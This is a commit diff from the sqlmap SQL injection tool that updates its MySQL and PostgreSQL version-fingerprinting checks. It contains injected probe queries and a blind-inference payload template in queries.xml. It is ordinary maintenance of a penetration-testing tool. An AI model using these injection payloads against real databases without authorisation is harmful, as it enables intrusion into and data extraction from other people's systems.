Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 7ad9639

Browse files
bdamelebdamele
committed
Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3
1 parent a19229c commit 7ad9639

4 files changed

Lines changed: 71 additions & 24 deletions

File tree

doc/ChangeLog

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -11,6 +11,8 @@ sqlmap (0.6.2-1) stable; urgency=low
1111
not 'public' schema or a system database;
1212
* Minor improvement to be able to dump entries on MySQL < 5.0 when
1313
database name, table name and column(s) are provided;
14+
* Updated the database management system fingerprint checks to correctly
15+
identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
1416
* Minor code restyling.
1517

1618
-- Bernardo Damele A. G. <[email protected]> Sat, 1 Nov 2008 10:00:00 +0100

plugins/dbms/mysql.py

Lines changed: 56 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -132,15 +132,15 @@ def __commentCheck(self):
132132

133133
return None
134134

135-
# MySQL valid versions updated at 07/2008
135+
# MySQL valid versions updated at 10/2008
136136
versions = (
137137
(32200, 32233), # MySQL 3.22
138138
(32300, 32354), # MySQL 3.23
139139
(40000, 40024), # MySQL 4.0
140140
(40100, 40122), # MySQL 4.1
141-
(50000, 50067), # MySQL 5.0
142-
(50100, 50126), # MySQL 5.1
143-
(60000, 60006), # MySQL 6.0
141+
(50000, 50072), # MySQL 5.0
142+
(50100, 50129), # MySQL 5.1
143+
(60000, 60008), # MySQL 6.0
144144
)
145145

146146
for element in versions:
@@ -202,6 +202,14 @@ def getFingerprint(self):
202202

203203

204204
def checkDbms(self):
205+
"""
206+
References for fingerprint:
207+
208+
* http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html
209+
* http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html
210+
* http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html
211+
"""
212+
205213
if conf.dbms in MYSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
206214
setDbms("MySQL %s" % kb.dbmsVersion[0])
207215

@@ -229,38 +237,66 @@ def checkDbms(self):
229237

230238
return False
231239

232-
query = "SELECT %s " % randInt
233-
query += "FROM information_schema.TABLES "
234-
query += "LIMIT 0, 1"
235-
236-
if inject.getValue(query) == randInt:
240+
# Determine if it is MySQL >= 5.0.0
241+
if inject.getValue("SELECT %s FROM information_schema.TABLES LIMIT 0, 1" % randInt) == randInt:
237242
setDbms("MySQL 5")
238243
self.has_information_schema = True
239244

240245
if not conf.extensiveFp:
241246
kb.dbmsVersion = [">= 5.0.0"]
242247
return True
243248

244-
self.currentDb = inject.getValue("DATABASE()")
245-
if self.currentDb == inject.getValue("SCHEMA()"):
246-
kb.dbmsVersion = [">= 5.0.2", "< 5.1"]
247-
248-
query = "SELECT %s " % randInt
249-
query += "FROM information_schema.PARTITIONS "
250-
query += "LIMIT 0, 1"
251-
252-
if inject.getValue(query) == randInt:
253-
kb.dbmsVersion = [">= 5.1"]
249+
# Check if it is MySQL >= 6.0.3
250+
if inject.getValue("SELECT %s FROM information_schema.PARAMETERS LIMIT 0, 1" % randInt) == randInt:
251+
if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
252+
kb.dbmsVersion = [">= 6.0.5"]
253+
else:
254+
kb.dbmsVersion = [">= 6.0.3", "< 6.0.5"]
255+
256+
# Or if it MySQL >= 5.1.2 and < 6.0.3
257+
elif inject.getValue("MID(@@plugin_dir, 1, 1)"):
258+
if inject.getValue("SELECT %s FROM information_schema.PROFILING LIMIT 0, 1" % randInt) == randInt:
259+
kb.dbmsVersion = [">= 5.1.28", "< 6.0.3"]
260+
elif inject.getValue("MID(@@innodb_stats_on_metadata, 1, 1)"):
261+
kb.dbmsVersion = [">= 5.1.17", "< 5.1.28"]
262+
elif inject.getValue("SELECT %s FROM information_schema.REFERENTIAL_CONSTRAINTS LIMIT 0, 1" % randInt) == randInt:
263+
kb.dbmsVersion = [">= 5.1.10", "< 5.1.17"]
264+
elif inject.getValue("SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1" % randInt) == randInt:
265+
kb.dbmsVersion = [">= 5.1.7", "< 5.1.10"]
266+
elif inject.getValue("SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1" % randInt) == randInt:
267+
kb.dbmsVersion = ["= 5.1.6"]
268+
elif inject.getValue("SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1" % randInt) == randInt:
269+
kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"]
270+
elif inject.getValue("MID(@@table_open_cache, 1, 1)"):
271+
kb.dbmsVersion = [">= 5.1.3", "< 5.1.5"]
272+
else:
273+
kb.dbmsVersion = ["= 5.1.2"]
274+
275+
# Or if it is MySQL >= 5.0.0 and < 5.1.2
276+
elif inject.getValue("MID(@@hostname, 1, 1)"):
277+
kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"]
278+
# NOTE: MySQL 5.0.12 introduced SLEEP() function
279+
# References:
280+
# * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-12.html
281+
# * http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_sleep
282+
elif inject.getValue("SELECT 1 FROM DUAL") == "1":
283+
kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"]
284+
elif inject.getValue("DATABASE() LIKE SCHEMA()"):
285+
kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"]
254286
else:
255-
kb.dbmsVersion = ["= 5.0.0 or 5.0.1"]
287+
kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"]
288+
289+
# Otherwise assume it is MySQL < 5.0.0
256290
else:
257291
setDbms("MySQL 4")
258292
kb.dbmsVersion = ["< 5.0.0"]
259293

260294
if not conf.extensiveFp:
261295
return True
262296

297+
# Check which version of MySQL , 5.0.0 it is
263298
coercibility = inject.getValue("COERCIBILITY(USER())")
299+
264300
if coercibility == "3":
265301
kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"]
266302
elif coercibility == "2":

plugins/dbms/postgresql.py

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -137,6 +137,10 @@ def getFingerprint(self):
137137

138138

139139
def checkDbms(self):
140+
"""
141+
Reference for fingerprint: http://www.postgresql.org/docs/8.3/interactive/release-8-3.html
142+
"""
143+
140144
if conf.dbms in PGSQL_ALIASES:
141145
setDbms("PostgreSQL")
142146

@@ -166,8 +170,13 @@ def checkDbms(self):
166170
if not conf.extensiveFp:
167171
return True
168172

169-
if inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)") == "2":
170-
kb.dbmsVersion = [">= 8.2.0"]
173+
transTimeCasted = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)") in ( "1", "2" )
174+
transTime = inject.getValue("SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)") in ( "1", "2" )
175+
176+
if transTimeCasted and not transTime:
177+
kb.dbmsVersion = [">= 8.3.0"]
178+
elif transTime:
179+
kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"]
171180
elif inject.getValue("GREATEST(5, 9, 1)") == "9":
172181
kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"]
173182
elif inject.getValue("WIDTH_BUCKET(5.35, 0.024, 10.06, 5)") == "3":

xml/queries.xml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -110,8 +110,8 @@
110110
<limitstring query=" OFFSET "/>
111111
<order query="ORDER BY %s ASC"/>
112112
<count query="COUNT(%s)"/>
113-
<substring query="SUBSTR((%s), %d, %d)"/>
114-
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
113+
<substring query="SUBSTR((%s)::text, %d, %d)"/>
114+
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
115115
<banner query="VERSION()"/>
116116
<current_user query="CURRENT_USER"/>
117117
<current_db query="CURRENT_DATABASE()"/>

0 commit comments

Comments
 (0)